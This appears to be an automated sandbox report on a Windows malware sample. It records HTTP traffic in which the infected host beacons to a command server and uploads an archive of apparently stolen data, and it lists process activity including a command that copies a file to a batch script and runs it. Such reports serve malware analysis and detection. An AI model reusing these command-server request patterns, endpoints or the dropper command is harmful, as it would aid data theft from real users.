                                        Nov 21, 2024 20:02:24.028208971 CET336INHTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:02:23 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Vary: Accept-Encoding
                                        Content-Length: 112
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 5a 6d 46 73 63 57 31 2b 4b 69 6f 69 51 6e 5a 36 64 57 64 43 64 6e 42 33 5a 79 6f 7a 4f 69 4a 6b 59 32 78 78 5a 58 35 6d 59 57 78 7a 5a 33 5a 43 64 48 4a 31 5a 79 68 6d 59 57 35 7a 5a 55 42 32 63 6e 31 6c 51 6d 52 68 62 48 46 6c 4b 43 67 6f 4b 6b 4a 6b 59 32 78 7a 5a 53 68 30 66 6b 42 6d 61 57 35 78 62 55 42 43 64 6e 42 33 5a 77 3d 3d
                                        Data Ascii: ZmFscW1+KioiQnZ6dWdCdnB3ZyozOiJkY2xxZX5mYWxzZ3ZCdHJ1ZyhmYW5zZUB2cn1lQmRhbHFlKCgoKkJkY2xzZSh0fkBmaW5xbUBCdnB3Zw==


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        74192.168.2.450076178.215.224.7480
                                        TimestampBytes transferredDirectionData
                                        Nov 21, 2024 20:02:24.267383099 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:02:25.600330114 CET203INHTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:02:25 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 62 68 6c 6f
                                        Data Ascii: bhlo


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        75192.168.2.450077178.215.224.7480
                                        TimestampBytes transferredDirectionData
                                        Nov 21, 2024 20:02:24.315921068 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:02:25.579082012 CET203INHTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:02:25 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 62 68 6c 6f
                                        Data Ascii: bhlo


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        76192.168.2.450078178.215.224.7480
                                        TimestampBytes transferredDirectionData
                                        Nov 21, 2024 20:02:26.054496050 CET136OUTGET /v10/ukyh.php?jspo=2021&jwvs=9A5605DE11447A0E2031624EE8FBDE HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:02:27.427364111 CET199INHTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:02:27 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 0
                                        Content-Type: text/html; charset=UTF-8


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        77192.168.2.450079178.215.224.7480
                                        TimestampBytes transferredDirectionData
                                        Nov 21, 2024 20:02:26.062470913 CET175OUTGET /v10/ukyh.php?jspo=1&jwvs=9A5605DE11447A0E2031624EE8FBDE&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:02:27.371377945 CET207INHTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:02:27 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 8
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 64 6d 39 70 5a 67 3d 3d
                                        Data Ascii: dm9pZg==


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        78192.168.2.450080178.215.224.7480
                                        TimestampBytes transferredDirectionData
                                        Nov 21, 2024 20:02:27.697149992 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:02:29.023269892 CET203INHTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:02:28 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 62 68 6c 6f
                                        Data Ascii: bhlo


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        79192.168.2.450081178.215.224.7480
                                        TimestampBytes transferredDirectionData
                                        Nov 21, 2024 20:02:28.002587080 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:02:29.314779997 CET203INHTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:02:29 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 62 68 6c 6f
                                        Data Ascii: bhlo


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        80192.168.2.450082178.215.224.7480
                                        TimestampBytes transferredDirectionData
                                        Nov 21, 2024 20:02:29.198939085 CET295OUTPOST /v10/ukyh.php HTTP/1.1
                                        Accept: text/*
                                        Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                        User-Agent: Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5
                                        Host: 178.215.224.74
                                        Content-Length: 8387
                                        Cache-Control: no-cache
                                        Nov 21, 2024 20:02:29.199002028 CET8387OUTData Raw: 6a 73 70 6f 3d 32 30 31 34 26 6a 77 76 73 3d 39 41 35 36 30 35 44 45 31 31 34 34 37 41 30 45 32 30 33 31 36 32 34 45 45 38 46 42 44 45 26 6d 65 6c 71 3d 54 47 31 6b 64 47 6f 77 5a 48 4e 53 55 54 64 69 59 6a 41 79 4a 7a 46 47 66 6c 52 70 5a 45 31
                                        Data Ascii: jspo=2014&jwvs=9A5605DE11447A0E2031624EE8FBDE&melq=TG1kdGowZHNSUTdiYjAyJzFGflRpZE1%2BTncnM0QlM0R8T1xPek5UWzBNVGUyTURPMkdEW3pPVE8lMUZ%2BTVMnMUQlM0Z0T1ElO0YnO0R%2BZmhHdTElMEpjJzBCRDJBJTJGckk5Wk9YMkBaVXE0cFkyTkJLT3htWE9GaUhscHJ0RmBEc1BVYVt3S1JtdW
                                        Nov 21, 2024 20:02:30.513305902 CET199INHTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:02:30 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 0
                                        Content-Type: text/html; charset=UTF-8
                                        Nov 21, 2024 20:02:32.047432899 CET295OUTPOST /v10/ukyh.php HTTP/1.1
                                        Accept: text/*
                                        Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                        User-Agent: Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5
                                        Host: 178.215.224.74
                                        Content-Length: 2463
                                        Cache-Control: no-cache
                                        Nov 21, 2024 20:02:32.047487974 CET2463OUTData Raw: 6a 73 70 6f 3d 32 30 31 35 26 6a 77 76 73 3d 39 41 35 36 30 35 44 45 31 31 34 34 37 41 30 45 32 30 33 31 36 32 34 45 45 38 46 42 44 45 26 6d 65 6c 71 3d 59 55 68 53 4d 6d 74 4b 54 54 5a 45 65 7a 74 6d 59 6e 73 33 64 6d 4e 56 54 48 6c 67 4f 30 5a
                                        Data Ascii: jspo=2015&jwvs=9A5605DE11447A0E2031624EE8FBDE&melq=YUhSMmtKTTZEeztmYns3dmNVTHlgO0Z0WG5TdVkyOXRMMFIxYkdsd2N5OCcyRmJFbH1hMG5rUFZnM09WVTJMZSUzRCc7RnxSUGpqalhAcVhaT2ViMFFvVjBab2FXTmxJSEBxYDJSMVsxUWdjMlY1YXlJdEtHMXBbM0h0YTI7b2ZDQlRmUEB3YjtIMkhhSlAy
                                        Nov 21, 2024 20:02:32.480151892 CET199INHTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:02:32 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 0
                                        Content-Type: text/html; charset=UTF-8
                                        Nov 21, 2024 20:02:34.031821966 CET295OUTPOST /v10/ukyh.php HTTP/1.1
                                        Accept: text/*
                                        Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                        User-Agent: Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5
                                        Host: 178.215.224.74
                                        Content-Length: 1699
                                        Cache-Control: no-cache
                                        Nov 21, 2024 20:02:34.031888962 CET1699OUTData Raw: 6a 73 70 6f 3d 33 34 26 6a 77 76 73 3d 39 41 35 36 30 35 44 45 31 31 34 34 37 41 30 45 32 30 33 31 36 32 34 45 45 38 46 42 44 45 26 6d 65 6c 71 3d 4d 54 49 33 4b 44 41 7a 4f 43 70 4c 4f 46 35 64 63 32 64 77 63 56 35 6f 62 57 35 6e 65 31 52 44 63
                                        Data Ascii: jspo=34&jwvs=9A5605DE11447A0E2031624EE8FBDE&melq=MTI3KDAzOCpLOF5dc2dwcV5obW5ne1RDcnBGYXRhXExvYWluXEdvbWVsZV5DaHJtbW1cV3FlciJEY3ZjXFJwbWZpbGcoM1tAVTMwPyo6MzooQThcV3ttcHFcaG9uZXNcQXJ4RmF0YV5Ob2NjbFxHbW9vbGdeQ2hwb29nXlVxZ3AgRGF2aV5Qcmdka2RlIjBZQl
                                        Nov 21, 2024 20:02:34.468791008 CET199INHTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:02:34 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 0
                                        Content-Type: text/html; charset=UTF-8
                                        Nov 21, 2024 20:02:36.265197992 CET427OUTPOST /v10/ukyh.php HTTP/1.1
                                        Accept: text/*
                                        Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                        User-Agent: Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5
                                        Host: 178.215.224.74
                                        Content-Length: 133
                                        Cache-Control: no-cache
                                        Data Raw: 6a 73 70 6f 3d 33 34 26 6a 77 76 73 3d 39 41 35 36 30 35 44 45 31 31 34 34 37 41 30 45 32 30 33 31 36 32 34 45 45 38 46 42 44 45 26 6d 65 6c 71 3d 4d 54 49 33 4b 44 6b 7a 4d 43 70 4c 4f 46 35 64 63 32 64 77 63 56 35 6f 62 57 35 6e 65 31 52 44 63 6e 42 47 59 58 52 68 58 46 4a 76 59 32 56 72 62 6d 64 63 54 32 31 36 61 57 35 73 59 56 78 45 61 58 70 6c 5a 47 31 34 58 46 6c 41 58 77 25 33 44 25 33 44
                                        Data Ascii: jspo=34&jwvs=9A5605DE11447A0E2031624EE8FBDE&melq=MTI3KDkzMCpLOF5dc2dwcV5obW5ne1RDcnBGYXRhXFJvY2VrbmdcT216aW5sYVxEaXplZG14XFlAXw%3D%3D
                                        Nov 21, 2024 20:02:36.688836098 CET199INHTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:02:36 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 0
                                        Content-Type: text/html; charset=UTF-8
                                        Nov 21, 2024 20:02:38.918868065 CET300OUTPOST /v10/ukyh.php?uvyw=6 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----974767299852498929531610575
                                        User-Agent: Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5
                                        Host: 178.215.224.74
                                        Content-Length: 29747
                                        Cache-Control: no-cache
                                        Nov 21, 2024 20:02:38.918972969 CET24720OUTData Raw: 2d 2d 2d 2d 2d 2d 39 37 34 37 36 37 32 39 39 38 35 32 34 39 38 39 32 39 35 33 31 36 31 30 35 37 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69
                                        Data Ascii: ------974767299852498929531610575Content-Disposition: form-data; name="file"; filename="C:\Users\user\AppData\Roaming\DolphinDumps\9A5605DE11447A0E2031624EE8FBDE_ff.7z"Content-Type: application/octet-stream7z'wr$
                                        Nov 21, 2024 20:02:39.038619995 CET1236OUTData Raw: 36 6c f3 f1 ce 4c bb d2 ba d9 b1 9d 54 7d e4 74 20 41 f2 b1 5a 8e f6 90 53 c4 17 94 8b 7e ee bd 2c b7 6a 6d 38 0a 07 54 4e 64 a7 0b 9d 2d a2 bc 47 bf ac 63 93 34 68 6c 0c a4 bb b7 a0 3d 0f 28 41 bc 8e 09 8d 7f e4 5a 26 5b c1 a7 77 7a f1 2c 59 b0
                                        Data Ascii: 6lLT}t AZS~,jm8TNd-Gc4hl=(AZ&[wz,YzdKL;Oho-uy{1('Ee1gC%TxKpN)tQ+'^(2:-{[.CF*'}6,8<AN"UiML7/Qel5XxY-DW0T
                                        Nov 21, 2024 20:02:39.038784027 CET2472OUTData Raw: 01 12 f6 ad 31 1e fd 69 a7 50 cc e5 0e d7 eb bd 71 da d3 31 fc f7 8b 7b 52 fc 73 5b e0 9f d0 10 fe 22 c1 8c 61 aa 80 92 aa 8e 39 72 88 d5 59 07 99 9b 4c 12 f3 e4 c0 68 03 6c 01 92 e4 bc 13 ad 23 4b 11 17 d1 61 74 17 a9 01 16 36 aa 37 e6 64 b8 e0
                                        Data Ascii: 1iPq1{Rs["a9rYLhl#Kat67dE*)S2e>rq&-I+^%bg(8ogK*r;WU8:@)XDkY1s]#es@uII?r#nH#Ykk(,_ &r,JZsE
                                        Nov 21, 2024 20:02:39.038881063 CET1319OUTData Raw: 80 1d 93 14 14 4e 3c 9f b1 66 51 9f b2 18 36 99 1c f4 7b cc 31 52 54 ee 94 10 66 ff af 45 ce d0 88 cb 84 38 db 0e 3e 9e c4 43 da ea 29 fd 98 c8 f9 ba 69 32 7e 61 49 77 e3 d5 bc fd 87 79 e7 58 90 73 97 23 83 15 f0 12 68 d6 13 16 df 06 01 3b fc 11
                                        Data Ascii: N<fQ6{1RTfE8>C)i2~aIwyXs#h;;1`^b&y=B1)[5>v4vuo1Ut);Mj@bpW%D{I"Cy"6}AzEENAAn[c:$0Nu~,6&!
                                        Nov 21, 2024 20:02:39.500746965 CET199INHTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:02:39 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 0
                                        Content-Type: text/html; charset=UTF-8


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        81192.168.2.450083178.215.224.7480
                                        TimestampBytes transferredDirectionData
                                        Nov 21, 2024 20:02:30.193702936 CET175OUTGET /v10/ukyh.php?jspo=1&jwvs=9A5605DE11447A0E2031624EE8FBDE&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:02:31.552397013 CET207INHTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:02:31 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 8
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 64 6d 39 70 5a 67 3d 3d
                                        Data Ascii: dm9pZg==


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        82192.168.2.450084178.215.224.7480
                                        TimestampBytes transferredDirectionData
                                        Nov 21, 2024 20:02:30.732347012 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:02:31.994302034 CET203INHTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:02:31 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 62 68 6c 6f
                                        Data Ascii: bhlo


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        83192.168.2.450085178.215.224.7480
                                        TimestampBytes transferredDirectionData
                                        Nov 21, 2024 20:02:32.319092989 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:02:33.591794968 CET203INHTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:02:33 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 62 68 6c 6f
                                        Data Ascii: bhlo


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        84192.168.2.450086178.215.224.7480
                                        TimestampBytes transferredDirectionData
                                        Nov 21, 2024 20:02:32.689687014 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:02:34.010883093 CET203INHTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:02:33 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 62 68 6c 6f
                                        Data Ascii: bhlo


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        85192.168.2.450087178.215.224.7480
                                        TimestampBytes transferredDirectionData
                                        Nov 21, 2024 20:02:33.822293043 CET175OUTGET /v10/ukyh.php?jspo=1&jwvs=9A5605DE11447A0E2031624EE8FBDE&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:02:35.180377007 CET207INHTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:02:34 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 8
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 64 6d 39 70 5a 67 3d 3d
                                        Data Ascii: dm9pZg==


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        86192.168.2.450088178.215.224.7480
                                        TimestampBytes transferredDirectionData
                                        Nov 21, 2024 20:02:34.885240078 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:02:36.151442051 CET203INHTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:02:35 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 62 68 6c 6f
                                        Data Ascii: bhlo


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        87192.168.2.450089178.215.224.7480
                                        TimestampBytes transferredDirectionData
                                        Nov 21, 2024 20:02:35.799936056 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:02:37.117151022 CET203INHTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:02:36 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 62 68 6c 6f
                                        Data Ascii: bhlo


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        88192.168.2.450090178.215.224.7480
                                        TimestampBytes transferredDirectionData
                                        Nov 21, 2024 20:02:37.571372032 CET175OUTGET /v10/ukyh.php?jspo=1&jwvs=9A5605DE11447A0E2031624EE8FBDE&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:02:38.912961960 CET207INHTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:02:38 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 8
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 64 6d 39 70 5a 67 3d 3d
                                        Data Ascii: dm9pZg==


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        89192.168.2.450091178.215.224.7480
                                        TimestampBytes transferredDirectionData
                                        Nov 21, 2024 20:02:37.584041119 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:02:38.908029079 CET203INHTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:02:38 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 62 68 6c 6f
                                        Data Ascii: bhlo


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        90192.168.2.450092178.215.224.7480
                                        TimestampBytes transferredDirectionData
                                        Nov 21, 2024 20:02:39.983726025 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:02:41.290039062 CET203INHTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:02:41 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 62 68 6c 6f
                                        Data Ascii: bhlo


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        91192.168.2.450093178.215.224.7480
                                        TimestampBytes transferredDirectionData
                                        Nov 21, 2024 20:02:40.169918060 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:02:41.536570072 CET203INHTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:02:41 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 62 68 6c 6f
                                        Data Ascii: bhlo


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        92192.168.2.450094178.215.224.7480
                                        TimestampBytes transferredDirectionData
                                        Nov 21, 2024 20:02:41.497349024 CET176OUTGET /v10/ukyh.php?jspo=3002&melq=e3ad1d0b2449c169e66efe472513a377*6&jwvs=9A5605DE11447A0E2031624EE8FBDE HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:02:42.797537088 CET203INHTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:02:42 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 74 72 75 65
                                        Data Ascii: true


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        93192.168.2.450095178.215.224.7480
                                        TimestampBytes transferredDirectionData
                                        Nov 21, 2024 20:02:41.781832933 CET175OUTGET /v10/ukyh.php?jspo=1&jwvs=9A5605DE11447A0E2031624EE8FBDE&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:02:43.138716936 CET207INHTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:02:42 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 8
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 64 6d 39 70 5a 67 3d 3d
                                        Data Ascii: dm9pZg==


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        94192.168.2.450096178.215.224.7480
                                        TimestampBytes transferredDirectionData
                                        Nov 21, 2024 20:02:44.272073030 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:02:45.550164938 CET203INHTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:02:45 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 62 68 6c 6f
                                        Data Ascii: bhlo


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        95192.168.2.450097178.215.224.7480
                                        TimestampBytes transferredDirectionData
                                        Nov 21, 2024 20:02:44.660490990 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:02:46.032340050 CET203INHTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:02:45 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 62 68 6c 6f
                                        Data Ascii: bhlo


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        96192.168.2.450098178.215.224.7480
                                        TimestampBytes transferredDirectionData
                                        Nov 21, 2024 20:02:45.747179031 CET143OUTGET /v10/ukyh.php?jspo=2016&jwvs=9A5605DE11447A0E2031624EE8FBDE&bsxa=1 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:02:48.183474064 CET204INHTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:02:46 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 5
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 66 61 6c 73 65
                                        Data Ascii: false


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        97192.168.2.450099178.215.224.7480
                                        TimestampBytes transferredDirectionData
                                        Nov 21, 2024 20:02:46.233840942 CET175OUTGET /v10/ukyh.php?jspo=1&jwvs=9A5605DE11447A0E2031624EE8FBDE&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:02:47.543230057 CET207INHTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:02:47 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 8
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 64 6d 39 70 5a 67 3d 3d
                                        Data Ascii: dm9pZg==


                                        Statistics

                                        CPU Usage

                                        Click to jump to process

                                        Memory Usage

                                        Click to jump to process

                                        High Level Behavior Distribution

                                        Click to dive into process behavior distribution

                                        Behavior

                                        Click to jump to process

                                        System Behavior

                                        General

                                        Target ID:0
                                        Start time:13:58:38
                                        Start date:21/11/2024
                                        Path:C:\Users\user\Desktop\vqMMwqCFZQ.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\vqMMwqCFZQ.exe"
                                        Imagebase:0x400000
                                        File size:1'069'345 bytes
                                        MD5 hash:8E55A7932D1B9649ABA9D3E97CA688CE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:true

                                        General

                                        Target ID:1
                                        Start time:13:58:39
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\cmd.exe" /c copy Trees Trees.bat & Trees.bat
                                        Imagebase:0x240000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:2
